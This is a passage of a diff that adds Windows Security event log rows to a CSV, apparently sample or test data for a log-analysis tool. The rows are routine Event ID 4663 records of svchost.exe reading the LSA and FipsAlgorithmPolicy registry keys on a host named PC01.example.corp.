+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452858</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452857</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452856</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452855</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452854</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452853</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452852</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452850</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452849</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452848</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452847</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452846</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452845</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452844</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452843</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
